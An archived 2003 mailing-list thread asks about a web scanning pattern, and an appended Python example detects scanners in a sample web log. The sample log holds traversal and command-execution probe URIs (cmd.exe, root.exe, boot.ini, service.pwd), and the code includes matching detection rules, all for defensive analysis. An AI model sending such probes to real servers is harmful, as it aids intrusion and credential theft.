RE: Does anyone recognize the scanner that causes this pattern ?
From: Jerry Shenk (jshenk
decommunications.com)
Date: Mon Apr 07 2003 - 10:34:02 CDT
Replying to you and the list....I can never seem to get postings on the list
anymore....not sure why.
That's quite a list of hits. Whisker would be one (among many) tools that
could generate a pattern like that. It doesn't look like a worm to me.
Seems like somebody has specifically targeted you...or is auditing a
neighboring web server and mis-typed an IP address;) It looks like a
scanning tool that's just looking for all kinds of vulnerabilities. Are
they all from the same source? Do you have any kind of anomaly-based IDS
like SHADOW that would be collecting all headers? If so, you could look for
the source IP address. If not, you could hook up something on the outside
and watch for that IP address.
-----Original Message-----
From: dean
packethunter.com [mailto:dean
packethunter.com]
Sent: Sunday, April 06, 2003 3:24 PM
To: incidents
securityfocus.com
Subject: Does anyone recognize the scanner that causes this pattern ?
I recently logged a fairly extensive web scan and am trying to ID the tool
responsible. Has anyone seen this particular pattern before ?
Thanks for any leads, Dean
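The question raised in the reply, whether the hits all come from the same source, can be answered from an ordinary web server access log. The sketch below is an added example and not part of either poster's message; the log lines, the addresses (documentation ranges), the probe categories and the thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in Common Log Format (not taken from the original post).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Apr/2003:15:01:02 -0500] "HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:02 -0500] "HEAD /_vti_bin/shtml.dll HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:03 -0500] "HEAD /_vti_pvt/service.pwd HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:03 -0500] "HEAD /cgi-bin/phf HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:04 -0500] "HEAD /iisadmin/ HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:04 -0500] "HEAD /robots.txt HTTP/1.0" 200 0
192.0.2.10 - - [06/Apr/2003:15:01:05 -0500] "HEAD /msadc/msadcs.dll HTTP/1.0" 404 0
192.0.2.10 - - [06/Apr/2003:15:01:05 -0500] "HEAD /../boot.ini HTTP/1.0" 400 0
198.51.100.7 - - [06/Apr/2003:15:02:10 -0500] "GET / HTTP/1.0" 200 5120
198.51.100.7 - - [06/Apr/2003:15:02:11 -0500] "GET /images/logo.gif HTTP/1.0" 200 2048
198.51.100.7 - - [06/Apr/2003:15:02:30 -0500] "GET /old-page.html HTTP/1.0" 404 210
203.0.113.5 - - [06/Apr/2003:15:03:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
"""

CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) \S+$'
)

def classify(uri):
    """Tag a request URI with the probe families it matches (illustrative set)."""
    decoded = unquote(uri).lower()          # catch %2F-encoded traversal too
    path = decoded.split("?", 1)[0]
    tags = set()
    if ".." in decoded:
        tags.add("traversal")
    if path.endswith(("cmd.exe", "root.exe")):
        tags.add("cmd_exec")
    if path.startswith("/_vti_"):
        tags.add("frontpage")
    return tags

def summarize(lines):
    """Group requests by source address and collect per-source counters."""
    stats = defaultdict(lambda: {"requests": 0, "head": 0, "errors": 0,
                                 "paths": set(), "tags": defaultdict(int)})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue                        # skip lines that are not CLF
        s = stats[m["src"]]
        s["requests"] += 1
        s["head"] += m["method"] == "HEAD"
        s["errors"] += m["status"].startswith("4")
        s["paths"].add(m["uri"])
        for tag in classify(m["uri"]):
            s["tags"][tag] += 1
    return stats

def likely_scanners(stats, min_paths=5, min_error_ratio=0.8, min_head_ratio=0.8):
    """Sources probing many distinct paths, mostly with HEAD, mostly failing.

    The thresholds are assumptions for this example; tune them per site.
    """
    flagged = []
    for src, s in stats.items():
        n = s["requests"]
        if (len(s["paths"]) >= min_paths
                and s["errors"] / n >= min_error_ratio
                and s["head"] / n >= min_head_ratio):
            flagged.append(src)
    return sorted(flagged)

if __name__ == "__main__":
    stats = summarize(SAMPLE_LOG.splitlines())
    for src in likely_scanners(stats):
        s = stats[src]
        print(src, s["requests"], "requests,", len(s["paths"]), "distinct paths,",
              dict(s["tags"]))
```

A single source that walks many unrelated paths fits the broad scanning tool described in the reply, while a source sending one fixed probe, like the third address in the sample, does not meet the breadth threshold.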